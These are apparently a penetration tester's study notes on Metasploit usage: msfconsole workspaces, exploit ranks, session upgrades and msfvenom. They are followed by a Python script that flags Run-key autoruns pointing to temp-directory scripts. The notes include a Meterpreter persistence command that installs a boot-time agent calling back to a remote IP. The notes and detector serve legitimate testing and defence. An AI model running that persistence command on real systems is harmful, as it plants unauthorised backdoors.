msfconsole
- search X Y
- X being exploit/recon, etc.
- Y being service
Ability to create workspaces to switch between clients/tenants
workspace -a
The only missing feature in the free version is the reporting, which can be automated.
set ConsoleLogging true - Saves the console logs in ~/.msf4/logs for future reference in write-ups
save → Saves the current config to /root/.msf4/config → Again, can be useful when working with multiple clients
“load” can load additional plugins, for example to interface with OpenVAS/Nessus
Start a test campaign
db_status (verification)
workspace -a client_name
db_import <various_other_scan> - in XML
Rank of an exploit MEANS chances of crashing the system - Manual/Low rank = HIGH chance of crashing
“show payloads” to investigate what it actually does / If there are multiple, choose with “set payload X”
set XX, but also unset
Always check if the exploit has a “CHECK” command, which checks whether the target is exploitable WITHOUT actually sending the payloads
“back” for return
“run” for auxiliary
“exploit” for exploits
Once you have a shell, always enter sessions -u NBR to upgrade the session
Meterpreter
Once you’ve got a shell you can get persistence by running
run persistence -X -i 20 -p 4444 -r <IP>
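Detection side of the command above (added example, not part of the original notes): with -X the legacy persistence script makes the agent start at boot through a value under the machine-wide Run registry key that points at a script dropped on disk, by default in the temp directory. The code below parses `reg query` output and flags Run values that launch a script from a temp directory; the sample output, the value names and the temp-directory heuristic are constructed assumptions.

```python
import re

# Constructed sample of `reg query` output for the machine-wide Run key.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    hTqLmZxWvB    REG_SZ    C:\Users\lab\AppData\Local\Temp\RkPwYdNs.vbs
    Backup    REG_SZ    wscript.exe "C:\Scripts\nightly.vbs"
"""

# `reg query` prints each value as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
VALUE_LINE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|bat|cmd|ps1)\b", re.I)
TEMP_DIR = re.compile(r"(%te?mp%|\\temp\\|\\tmp\\)", re.I)


def parse_reg_query(text):
    """Yield (key, name, type, data) for every value in `reg query` output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            yield key, m["name"], m["type"], m["data"].strip()


def suspicious_autoruns(text):
    """Return Run-key values whose command runs a script file from a temp directory."""
    hits = []
    for key, name, _type, data in parse_reg_query(text):
        if not key.lower().endswith(r"\currentversion\run"):
            continue
        # Heuristic (assumption): legitimate autoruns rarely start scripts from temp.
        if SCRIPT_EXT.search(data) and TEMP_DIR.search(data):
            hits.append((key, name, data))
    return hits


if __name__ == "__main__":
    for key, name, data in suspicious_autoruns(SAMPLE):
        print(f"[!] {key}\\{name} -> {data}")
```

Feed it the saved output of `reg query` for the Run keys collected during triage; the scheduled script in C:\Scripts is left alone because it does not live in a temp directory.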
msfvenom
Tool to create and encode payloads. Possible to create .exe files, etc.